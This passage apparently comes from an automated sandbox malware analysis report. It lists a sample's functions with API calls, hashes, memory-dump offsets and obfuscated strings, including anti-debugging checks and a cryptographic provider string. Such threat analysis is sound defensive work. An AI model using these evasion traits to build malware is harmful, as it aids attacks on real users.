                                                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                      • API String ID: 3642901890-63410773
                                                      • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                      • Instruction ID: 7a47fa8e4954458912261d74c4741c33f63bc6065e093baaa0df938881e0ceae
                                                      • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                      • Instruction Fuzzy Hash: DF817271A002189FEF249F24CC45B99BBB5FF49300F5081E9E94DE72A0EB35AA858F55
                                                      Function 0097895D Relevance: 10.4, Strings: 7, Instructions: 1670COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A}$@mfO$EhW<$dH@$".=$UZu$>
                                                      • API String ID: 0-3007833122
                                                      • Opcode ID: 12a3208d86e35ee3a5623c0d56b2df6747e53b830764b96093173119056d3378
                                                      • Instruction ID: 269271a90f547b53b087ce67e8b36d4b23dfc0914bf445579c93b549fe7b5ea5
                                                      • Opcode Fuzzy Hash: 12a3208d86e35ee3a5623c0d56b2df6747e53b830764b96093173119056d3378
                                                      • Instruction Fuzzy Hash: 22B24AF360C204AFE304AE2DEC8567ABBD9EFD4320F1A853DE6C4C7744E97598058696
                                                      Function 004188AA Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1451COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                      • Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
                                                      • Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                      • Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45
                                                      Function 0098472B Relevance: 9.1, Strings: 6, Instructions: 1568COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #<;m$.pp$3l?_$=j>$yuM$-g
                                                      • API String ID: 0-1680358507
                                                      • Opcode ID: 739b5d4e13379a0c70082417745dd4289312ebfbeaaf9da32b516beb2bc37503
                                                      • Instruction ID: e342c5eb0f5f838ac24bf21111c96ced527ebda7b1f6bfeba2c4baf3a7cf3ff7
                                                      • Opcode Fuzzy Hash: 739b5d4e13379a0c70082417745dd4289312ebfbeaaf9da32b516beb2bc37503
                                                      • Instruction Fuzzy Hash: 4EB2D5F360C2049FE7046E29EC8577AFBE9EF94720F1A493DEAC483744E63558058697
                                                      Function 0098613F Relevance: 7.9, Strings: 5, Instructions: 1625COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 1[q$;<~w$Ba)s$Qzg$}>w
                                                      • API String ID: 0-2801270829
                                                      • Opcode ID: 6ccf830f407eb3b94d9c99d7e3929ab4e46931dfe5e98f77c55e18e7f12b078d
                                                      • Instruction ID: 3afb87cc38edf4957e8a582b44740d618fd0f026f761f6ed1c95dd95eee5addb
                                                      • Opcode Fuzzy Hash: 6ccf830f407eb3b94d9c99d7e3929ab4e46931dfe5e98f77c55e18e7f12b078d
                                                      • Instruction Fuzzy Hash: 53B2D4F360C200AFE3046E29EC8567ABBE9EF94720F16493DE6C5C7744EA3558418797
                                                      Function 00982B9A Relevance: 6.7, Strings: 4, Instructions: 1680COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: p>$HU\$qVl9$.N$
                                                      • API String ID: 0-1998200299
                                                      • Opcode ID: 06872d9e7e6348f2ea820da067b731b65ffec4034954ff39a794abeaae7a0f7e
                                                      • Instruction ID: acaf028741f687705f05364e1e7506efba558d4fd907f799da7ece4a888d5737
                                                      • Opcode Fuzzy Hash: 06872d9e7e6348f2ea820da067b731b65ffec4034954ff39a794abeaae7a0f7e
                                                      • Instruction Fuzzy Hash: 81B20BF3A0C2049FE304AE2DEC8577ABBE9EF94720F1A453DEAC4C7744E53598058696
                                                      Function 00980FCF Relevance: 6.6, Strings: 4, Instructions: 1629COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *|?$:Qb$bL4$dp3~
                                                      • API String ID: 0-2580681535
                                                      • Opcode ID: 36162c5ae51b32ca17cd0bda5d9845d426f4f437466caec8cc671d634595e11f
                                                      • Instruction ID: 84e10ae8ebe251b2e14551496728906cdb37eb709b54de92f4281bbd78fe5f6d
                                                      • Opcode Fuzzy Hash: 36162c5ae51b32ca17cd0bda5d9845d426f4f437466caec8cc671d634595e11f
                                                      • Instruction Fuzzy Hash: 75B2D8F3A0C2009FE7046E2DEC4577ABBE9EF94320F1A493DE6C5C7744EA3598058696
                                                      Function 0097A37C Relevance: 6.6, Strings: 4, Instructions: 1579COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: >u5$@9]4$Fo$kGB
                                                      • API String ID: 0-3332624244
                                                      • Opcode ID: e87ed9626d746b5146aa695466277921201b83811d5dbbdc0439898d661a42ab
                                                      • Instruction ID: 117fb7272c11b0acf4a07a2f0fd290394d76bc55b9fb7ba029f485ccec62d3d1
                                                      • Opcode Fuzzy Hash: e87ed9626d746b5146aa695466277921201b83811d5dbbdc0439898d661a42ab
                                                      • Instruction Fuzzy Hash: E3B2F7F3A0C2049FE704AE29EC8567AF7E5EFD4720F1A893DEAC483744E63558058697
                                                      Function 004097B2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                      • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                      • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                      • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                      • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                      Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                      • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                      • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                      • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                      • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                      Function 04B19A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B19A25
                                                      • IsDebuggerPresent.KERNEL32 ref: 04B19AF1
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B19B11
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 04B19B1B
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                      • Instruction ID: a5cbbcd2387ad262351a297334f2bd5885b8d5497af02a62c8a2f6e0f75dc8c8
                                                      • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                      • Instruction Fuzzy Hash: 213107B5D01258DBDB10DFA4D989BCDBBB8BF08304F5040EAE409AB250EB71AB85CF04
                                                      Function 04CC2070 Relevance: 5.5, Strings: 4, Instructions: 504COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0,@$@$@,@$`,@
                                                      • API String ID: 0-1654315312
                                                      • Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                                      • Instruction ID: 4643f998cb76e8ea5c5b126531c468f34bbacb2bd78d64faae6a62c85714853b
                                                      • Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                                      • Instruction Fuzzy Hash: 67126971F002159BDB14CFA9D980BADB7B6FF48714F1841AEE909AB381DB70E941CB94
                                                      Function 0097F430 Relevance: 5.4, Strings: 3, Instructions: 1632COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: o0+o$}1{.$Z!
                                                      • API String ID: 0-3829370312
                                                      • Opcode ID: d78f0a42355c42bf5f81ba4eb95904cd63800e87ebfd77132733a06148086fca
                                                      • Instruction ID: e810423d65731a3ffcd568110ad3cc9a689ac1295c6ca3f074cd8b63c06b8f29
                                                      • Opcode Fuzzy Hash: d78f0a42355c42bf5f81ba4eb95904cd63800e87ebfd77132733a06148086fca
                                                      • Instruction Fuzzy Hash: 2AB227F36083049FE3046E2DEC8577ABBD9EF94320F16893DEAC487744EA3599058697
                                                      Function 0040C0B3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                      • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                      • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                      • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                      Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                      • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                      • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                      • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                      Function 04B1C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B1C412
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B1C41C
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B1C429
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                      • Instruction ID: e1c4495de992d8c0654f171516dba084d6685433cdb702f6f66317404557fd46
                                                      • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                      • Instruction Fuzzy Hash: 533188B5941218DBCB21DF68DD887DDBBB4BF08314F5041EAE41CA7260E774AB858F45
                                                      Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                      • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                      • ExitProcess.KERNEL32 ref: 10005F60
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                      • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                      • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                      • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                      Function 04B1F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,?,04B1F173,00000000,0041D0A0,?,00000000,?,04B21714), ref: 04B1F196
                                                      • TerminateProcess.KERNEL32(00000000,?,04B1F173,00000000,0041D0A0,?,00000000,?,04B21714), ref: 04B1F19D
                                                      • ExitProcess.KERNEL32 ref: 04B1F1AF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                      • Instruction ID: 87f8603cd2cf625f772ccd37a32e7b075eb2f9869b18e5570dbaa987c736cf6b
                                                      • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                      • Instruction Fuzzy Hash: 23E0EC71444158BFDF117F64DD48A993B79FF50685F404464F8058A231CB7AEDA1CB94
                                                      Function 0097BE5E Relevance: 4.1, Strings: 2, Instructions: 1631COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *{~^$shk=
                                                      • API String ID: 0-1599189495
                                                      • Opcode ID: b4aac6b4f0deba3769e9b81bf741e1535ddfdd5ef5e6a5a6bb68af2d87310da6
                                                      • Instruction ID: 9c028314696e5d8e20925271b82617d9e96645fb96a80e35a8c8b660d83a1d8a
                                                      • Opcode Fuzzy Hash: b4aac6b4f0deba3769e9b81bf741e1535ddfdd5ef5e6a5a6bb68af2d87310da6
                                                      • Instruction Fuzzy Hash: D0B228F360C2049FE304AE2DEC8567ABBE5EFD4720F1A463DEAC583744EA3558058697
                                                      Function 04B1092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$GetProcAddress.$l
                                                      • API String ID: 0-2784972518
                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction ID: 8009541b2052df7cce97b3afb7058bb77b8415d5be7ebb4fa0d3000fa27d435a
                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                      • Instruction Fuzzy Hash: D2315CB6900609DFDB10DF99C880AADBBF5FF48364F54408AD941A7720D771FA85CBA4
                                                      Function 0040F320 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                      • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                                      • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                      • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                                      Function 04CCE720 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                      • Instruction ID: 93714f554b87a7bd7e992e4410f7da45196134108a20f6982910b4b5ff658d61
                                                      • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                      • Instruction Fuzzy Hash: 4FF14F71E012199FDF14CFA9C8906AEBBF2FF89314F15826DD819AB344D731AA41CB94
                                                      Function 04B1F587 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                      • Instruction ID: d3366046344ee49fdbe0d89bd8c7d18aee6f63c8e43de38184af7a0e7ebdc405
                                                      • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                      • Instruction Fuzzy Hash: FEF13F71E00219DFDF14CFA8D9806ADF7B1FF88314F6582AAD919AB354D731A941CB90
                                                      Function 04CD7CAA Relevance: 3.0, APIs: 1, Instructions: 1451COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID:
                                                      • API String ID: 4168288129-0
                                                      • Opcode ID: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                                      • Instruction ID: b0b10029bc80f1721381a392eaacad70159ae46ba8784c00d90a069e315436e9
                                                      • Opcode Fuzzy Hash: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                                      • Instruction Fuzzy Hash: BCC24A71E046288FDB24DE28DD407EAB3B6EB88315F1445EADA1DE7240E774BE858F50
                                                      Function 00977F5E Relevance: 2.7, Strings: 2, Instructions: 244COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: qw{$tw{
                                                      • API String ID: 0-2926551120
                                                      • Opcode ID: 4f53d99168161709745f7171c140826f9c1a80b5c06a6b6b456d9164d1b4ecf7
                                                      • Instruction ID: f9fc5c4c64cad35cc88b0bd9a5625471d7e5816ab68567e836a997fe530bd21d
                                                      • Opcode Fuzzy Hash: 4f53d99168161709745f7171c140826f9c1a80b5c06a6b6b456d9164d1b4ecf7
                                                      • Instruction Fuzzy Hash: 167156B3A082189FD3547E2DEC457BABBD9DF84320F0A452EE6C4D7744E936984086C7
                                                      Function 00413CE6 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
